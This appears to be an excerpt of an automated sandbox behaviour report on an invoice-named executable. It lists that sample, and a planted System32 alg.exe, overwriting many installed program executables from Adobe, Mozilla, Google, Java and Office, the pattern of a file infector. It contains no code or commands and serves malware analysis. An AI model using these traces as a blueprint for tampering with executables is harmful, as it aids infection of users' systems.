                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
